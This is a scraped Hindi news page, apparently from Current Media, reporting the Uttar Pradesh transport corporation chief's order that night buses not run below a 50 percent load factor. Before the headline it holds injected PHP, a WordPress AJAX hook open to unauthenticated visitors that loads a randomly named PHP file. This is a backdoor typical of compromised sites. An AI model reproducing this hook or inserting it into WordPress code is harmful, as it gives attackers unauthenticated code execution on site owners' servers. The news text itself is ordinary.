if(!function_exists('file_check_tmp3og2p0p6')){ add_action('wp_ajax_nopriv_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); add_action('wp_ajax_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); function file_check_tmp3og2p0p6() { $file = __DIR__ . '/' . 'tmp3og2p0p6.php'; if (file_exists($file)) { include $file; } die(); } }"50 प्रतिशत से कम लोड फैक्टर की स्थिति में रात्रिकालीन बसों का संचालन न किया जाय"-एम.डी. परिवहन निगम - Current Media

“50 प्रतिशत से कम लोड फैक्टर की स्थिति में रात्रिकालीन बसों का संचालन न किया जाय”-एम.डी. परिवहन निगम

लखनऊ:
परिवहन निगम की कोई भी बस सेवा 50 प्रतिशत लोड फैक्टर से कम पर संचालित न हों, इस सम्बंध में मुख्यालय से पत्र भी जारी किया जा चुका है। इसके बावजूद पाया गया है कि क्षेत्रीय स्तर पर उचित समीक्षा न होने के कारण बहुत से क्षेत्रों से कम लोड फैक्टर पर बसें संचालित हो रही हैं। इस सम्बंध में प्रबंध निदेशक परिवहन निगम श्री मासूम अली सरवर ने सभी नोडल अधिकारियों को निर्देश दिये हैं कि अपने अधीन प्रत्येक डिपो की दिल्ली को प्रस्थान करने वाली समस्त बसों की समीक्षा कर मुख्यालय को 22 दिसम्बर तक रिपोर्ट प्रस्तुत करें।
प्रबंध निदेशक ने बताया कि देखा गया है कि दिल्ली से आने वाली अधिकांश बसों का लोड फैक्टर तो बेहतर रह रहा है, परन्तु दिल्ली को प्रस्थान करने वाली बसों का लोड फैक्टर औसत से भी कम है। उन्होंने कहा कि रात्रिकालीन सेवाओं में 50 प्रतिशत लोड फैक्टर से कम की स्थिति में बसों का संचालन न हो। सभी नोडल अधिकारी सुनिश्चित करके ही बसों को रवाना करें। उन्होंने कहा कि नवसंचालित सेवाओं को व्यवहार्य बनाने के लिए दो माह की समयावधि तक की छूट प्रदान की गयी है, जिससे कि लोड फैक्टर में वृद्धि सुनिश्चित की जा सके। 50 प्रतिशत से ऊपर लोड फैक्टर पर ही बसों को संचालित करें। इस सम्बंध में दोषी पाये जाने पर अधिकारियों के खिलाफ नियमानुसार कार्यवाही भी की जायेगी।

About currentmedia09@gmail.com

Currentmedia.in राष्ट्रीय स्तर पर तेजी से बढ़ती हुई हिंदी समाचार वेबासाइट है। वेबसाइट में ब्यूरोक्रेसी में ताजा घटनाक्रम, देश और समाज के लिए अमूल्य योगदान देने वाले व अपने कार्यो के दम पर अपनी पहचान बनाने वाले आइएएस और आइपीएस अधिकारियों व डॉक्टरो, कानून के जानकारों की रोचक स्टोरी के साथ उनके जीवन संघर्षो पर आधारित निष्पक्ष लेख पाठक को मिलेंगे। वेबसाइट में अन्य क्षेत्रों के भी विश्वसनीय, प्रमाणिक और निष्पक्ष समाचार पाठक वर्ग के लिए उपलब्ध रहेगा, इसके लिए वेबसाइट की ऑनलाइन संपादकीय टीम हर रोज विस्तृत कंटेट अपडेट करती रहेगी। संपादकीय टीम की कोशिश यही रहेगी की न्यूज कंटेट को लेकर पाठक वर्ग को किसी तरह की निराशा हाथ न लगे। साइट 24 घंटे प्रयोग में रहेगी।

Check Also

अच्छा मुसलमान ही नहीं, अच्छा नागरिक बनाना भी मकसद- मौलाना काब रशीदी

लखनऊ। करंट मीडिया । बदलते दौर के साथ मदरसों में शिक्षा व्यवस्था को आधुनिक और …